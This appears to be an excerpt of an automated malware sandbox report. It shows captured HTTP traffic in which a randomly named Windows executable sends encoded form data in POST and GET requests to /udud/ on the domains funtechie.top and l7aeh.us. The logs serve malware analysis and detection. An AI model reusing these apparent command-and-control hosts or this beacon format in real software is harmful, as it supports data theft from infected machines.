href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>40
                                                                                                May 27, 2024 12:35:31.247708082 CEST1289INData Raw: 34 20 2d 20 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 20 3a 3a 20 6d 61 74 72 69 6d 6f 6e 69 6f 76 61 6c 65 6e 74 69 6e 61 65 74 6f 6d 6d 61 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                Data Ascii: 4 - Pagina non trovata :: matrimoniovalentinaetommaso</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="msapplication-tap-highlight" content="no"> <link href="https://d1di2lzuh97fh2.cloudfront.
                                                                                                May 27, 2024 12:35:31.247790098 CEST1289INData Raw: 61 2f 31 61 6e 2f 31 61 6e 66 70 67 2e 63 73 73 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 64 61 74 61 2d 77 6e 64 5f 74 79 70 6f 67 72 61 70 68 79 5f 66 69 6c 65 3d 22 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                Data Ascii: a/1an/1anfpg.css?ph=cb3a78e957" data-wnd_typography_file=""><link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5em)" dis
                                                                                                May 27, 2024 12:35:31.247843027 CEST1289INData Raw: 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61
                                                                                                Data Ascii: a se hai inserito l'indirizzo corretto."><meta name="keywords" content=""><meta name="generator" content="Webnode 2"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="black"><met
                                                                                                May 27, 2024 12:35:31.247951984 CEST1289INData Raw: 28 76 61 72 20 67 3d 31 3b 33 3e 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d 62 2e 63 68 61 72 41 74
                                                                                                Data Ascii: (var g=1;3>=g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k+(0>k.in
                                                                                                May 27, 2024 12:35:31.248073101 CEST1289INData Raw: 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 72 20 77 6e 64 2d 6e 68 2d 6d 20 68 6d 2d 68 69 64 64 65 6e 20 6d 65 6e 75 2d 64 65 66 61 75 6c 74 22
                                                                                                Data Ascii: -classic wnd-na-c logo-classic sc-w wnd-w-wider wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><div class="h-w h-f wnd-f
                                                                                                May 27, 2024 12:35:31.248161077 CEST1289INData Raw: 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d 67 69 6f 72 6e 6f 2d 64 65 6c 2d 6d 61 74 72 69 6d 6f 6e 69 6f 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                                Data Ascii: </li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><span class="menu-item-text">Conferma pa
                                                                                                May 27, 2024 12:35:31.248219967 CEST1289INData Raw: 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e
                                                                                                Data Ascii: e controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf"> <div class="sw cf"><div class="sw-c cf"><
                                                                                                May 27, 2024 12:35:31.248233080 CEST1289INData Raw: 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0d 0a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang lang-select cf"></div>
                                                                                                May 27, 2024 12:35:31.248322010 CEST1289INData Raw: 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20 36 2e 31 32 37 20 36 2e 37 30 37 7a 6d 2d 31 2e 38 34 38 20 30 63 30 2d 33 2e 34 38 2d 31 2e 32 37 2d 35 2e 30 30 34 2d 34 2e 32 34 32 2d 35 2e 30 30 34 2d 32 2e 39
                                                                                                Data Ascii: .65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5.91 0-5.693 5.51-5.693 6.888 0 5.402 3.226 6.526 5.945
                                                                                                May 27, 2024 12:35:31.434861898 CEST1289INData Raw: 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36 33 20 30 20 35 2e 39 38 32 20 33 2e 35 39 20 36 2e 38 39 20 35 2e 37 32 38 20 36 2e 38 39 20 34 2e 39 33 20 30 20 35 2e 32 39 34 2d 33 2e 31 35 35 20 35 2e 32 39 34
                                                                                                Data Ascii: .72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><section class="cb cb-dark" id="cookiebar" style="display:none;"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                62192.168.11.3049892203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:44.956448078 CEST742OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 61 48 5a 53 61 47 7a 31 76 30 61 61 6f 30 44 53 78 78 6f 75 6b 72 36 38 30 66 4a 57 57 4e 53 4f 64 75 47 4a 2b 55 5a 64 63 46 71 36 41 33 52 69 34 6c 73 52 6d 50 33 34 4a 75 33 6e 36 6c 44 6a 46 6a 41 67 50 42 41 65 76 4c 66 79 48 66 45 58 39 72 61 51 58 59 66 75 43 54 70 37 4b 64 59 65 36 55 43 41 4d 65 6f 4a 39 45 46 7a 30 41 4e 48 55 6d 43 6c 49 76 6f 2f 36 72 2f 79 45 4b 4c 7a 58 61 4b 78 4a 67 52 4a 6f 4c 68 36 64 76 31 54 48 48 6f 43 58 68 70 4b 41 43 65 52 57 71 50 2b 44 48 49 79 6c 63 55 4b 5a 6f 63 46 78 73 6e 54 32 6b 36 50 42 51 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5saHZSaGz1v0aao0DSxxoukr680fJWWNSOduGJ+UZdcFq6A3Ri4lsRmP34Ju3n6lDjFjAgPBAevLfyHfEX9raQXYfuCTp7KdYe6UCAMeoJ9EFz0ANHUmClIvo/6r/yEKLzXaKxJgRJoLh6dv1THHoCXhpKACeRWqP+DHIylcUKZocFxsnT2k6PBQ==
                                                                                                May 27, 2024 12:35:45.126169920 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:45 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                63192.168.11.3049893203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:47.645598888 CEST762OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 62 6b 78 53 59 68 66 31 70 55 61 56 69 55 44 53 37 52 70 70 6b 72 32 38 30 62 78 47 57 2f 32 4f 64 4d 4f 4a 76 6d 78 64 64 46 71 36 4f 58 52 6e 6d 56 73 61 6d 50 72 4f 4a 72 50 6e 36 6c 48 6a 46 68 49 67 50 79 34 5a 73 37 66 77 4c 2f 45 52 33 4c 61 51 58 59 66 75 43 53 5a 64 4b 65 6f 65 36 6b 79 41 4d 37 45 4b 2b 45 46 79 7a 41 4e 48 46 32 43 68 49 76 70 71 36 70 4b 36 45 4f 37 7a 58 61 61 78 4a 78 52 49 68 4c 68 38 53 50 30 7a 48 58 73 4d 59 79 56 64 50 41 4f 57 4d 4b 48 36 4c 77 35 6f 34 66 67 49 4b 49 67 6f 74 74 4b 37 30 6d 37 55 63 62 48 72 4f 70 66 41 6c 48 6a 65 45 79 34 44 4f 39 33 44 4c 6f 59 3d
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/2OdMOJvmxddFq6OXRnmVsamPrOJrPn6lHjFhIgPy4Zs7fwL/ER3LaQXYfuCSZdKeoe6kyAM7EK+EFyzANHF2ChIvpq6pK6EO7zXaaxJxRIhLh8SP0zHXsMYyVdPAOWMKH6Lw5o4fgIKIgottK70m7UcbHrOpfAlHjeEy4DO93DLoY=
                                                                                                May 27, 2024 12:35:47.820323944 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:47 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                64192.168.11.3049894203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:50.331497908 CEST1679OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.funtechie.top
                                                                                                Referer: http://www.funtechie.top/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 43 75 6d 37 43 4d 7a 76 4d 54 35 73 62 6b 78 53 59 68 66 31 70 55 61 56 69 55 44 53 37 52 70 70 6b 72 32 38 30 62 78 47 57 2f 2b 4f 64 35 43 4a 39 33 78 64 50 56 71 36 51 48 52 6d 6d 56 73 39 6d 50 69 48 4a 72 7a 52 36 6e 50 6a 46 43 51 67 45 6a 34 5a 37 72 66 77 44 66 45 55 39 72 61 46 58 59 50 71 43 54 6c 64 4b 65 6f 65 36 6e 71 41 4b 75 6f 4b 34 45 46 7a 30 41 4e 54 55 6d 43 4a 49 76 67 52 36 70 50 59 48 39 7a 7a 55 37 71 78 4b 48 6c 49 67 72 68 2b 56 50 30 52 48 57 52 4f 59 79 4a 37 50 42 71 38 4d 4b 2f 36 49 45 30 6f 6e 73 45 38 5a 71 30 6e 6d 76 32 51 6a 45 4c 6b 65 70 44 35 42 70 44 6a 79 55 32 7a 61 57 78 59 57 34 65 45 56 74 36 4e 37 54 4f 4b 4a 50 61 4c 72 38 2f 59 42 6a 56 68 69 4c 6c 42 49 44 73 45 36 37 6f 7a 6e 4f 77 54 32 4e 76 4f 48 48 78 53 54 55 46 65 39 72 55 67 56 4b 77 72 75 69 57 43 6f 47 56 36 55 71 54 56 31 6f 76 43 4b 30 39 4b 6c 6c 4c 4b 58 72 62 75 62 52 77 6f 66 65 62 73 79 47 59 6c 53 44 69 51 4b 6a 6f 4e 65 30 75 46 79 47 53 57 6e 6d 51 6b 69 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=Cum7CMzvMT5sbkxSYhf1pUaViUDS7Rppkr280bxGW/+Od5CJ93xdPVq6QHRmmVs9mPiHJrzR6nPjFCQgEj4Z7rfwDfEU9raFXYPqCTldKeoe6nqAKuoK4EFz0ANTUmCJIvgR6pPYH9zzU7qxKHlIgrh+VP0RHWROYyJ7PBq8MK/6IE0onsE8Zq0nmv2QjELkepD5BpDjyU2zaWxYW4eEVt6N7TOKJPaLr8/YBjVhiLlBIDsE67oznOwT2NvOHHxSTUFe9rUgVKwruiWCoGV6UqTV1ovCK09KllLKXrbubRwofebsyGYlSDiQKjoNe0uFyGSWnmQkiySDijCFwfzIpya5hdz52Bl5yHDngIzGFlVPG6x2UoCHL8gRF79RBEQcyEzS1li3EFj/Jo4m18U06opwRBRaQvPD1jUV7E43U25ivyANWKYlTFdjeY3nEnUA/D3cXlDIKOqciYsuzGw7nVpX6sML+pu8eyqqOnqWGdBGVq2gSO6o1T2TcAc3T7If/zODpPTi9qf7sg+qahdiYwbbu17z1sd6fVF2UmrKnopujO0ACQb/fKo0Ops7KO+cR4CVdBvrvjimndtfgiFZT25CPMMEDvRg6Ufn48jIm36cyHWwfFohqgHDKcakBjUwjjCNZG1DK/S/3xCVQdk+slrgI6B6vPDRFN1Ar76bH4XsLT6Jqr5OchtE+G6JN9Up9lVwoLPiFaR3Qzy9shpRjeZv4Uw6DJfSrolrMAQ7Wi/xBAcyhdb2BasOVQoMP145EwBxJNZWYAwuAWr5hVSJWGsdC/XIw7LmlMXAtMotaKRAqmcevnHdHovChzApfgWb0JxiDZifOAphGeXFmXnnTJ61Y4LsiNr6pBfc7syt2Tc+NRCg4N53T4MEGFDn0USCfhcelDyVYBYYrMErTi/aSmFlx+DUZ2Whcnczot2PAgsnf9mo9eBja2jWafQ0b6s3KYYfhh89h1Mndkstw62hlYkOCLB0qbgvaCqjh++4W0C [TRUNCATED]
                                                                                                May 27, 2024 12:35:50.501384020 CEST533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:50 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                65192.168.11.3049895203.161.49.193807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:53.016457081 CEST478OUTGET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:53.197582960 CEST548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:35:53 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                66192.168.11.304989691.195.240.123807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:58.404426098 CEST727OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.l7aeh.us
                                                                                                Referer: http://www.l7aeh.us/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 6b 6e 57 47 39 6c 67 7a 50 58 46 4a 62 51 52 49 77 2f 6a 32 6e 36 4e 5a 33 42 4a 55 39 56 77 51 45 53 78 4c 62 74 2b 6d 57 38 67 68 33 32 53 63 72 61 32 4f 6e 61 4b 75 45 68 32 63 77 69 36 66 50 41 6e 68 33 67 32 6a 6c 58 64 6c 6e 31 6f 2b 35 4c 59 54 55 32 39 4f 46 6d 72 50 79 4a 61 79 31 38 7a 42 73 44 79 37 67 45 4d 7a 59 47 56 6e 54 70 52 66 6e 73 59 51 42 6c 50 6c 72 76 45 36 66 77 46 48 49 50 37 73 77 64 37 7a 62 77 55 73 4f 53 6f 7a 77 2f 68 77 63 68 75 73 2f 6f 41 38 59 53 4d 37 4a 46 39 2b 38 50 67 58 4f 6e 72 6b 2f 53 70 6e 5a 48 57 4e 76 2b 62 4c 4d 76 6f 72 31 67 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=knWG9lgzPXFJbQRIw/j2n6NZ3BJU9VwQESxLbt+mW8gh32Scra2OnaKuEh2cwi6fPAnh3g2jlXdln1o+5LYTU29OFmrPyJay18zBsDy7gEMzYGVnTpRfnsYQBlPlrvE6fwFHIP7swd7zbwUsOSozw/hwchus/oA8YSM7JF9+8PgXOnrk/SpnZHWNv+bLMvor1g==
                                                                                                May 27, 2024 12:35:58.594926119 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:58 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
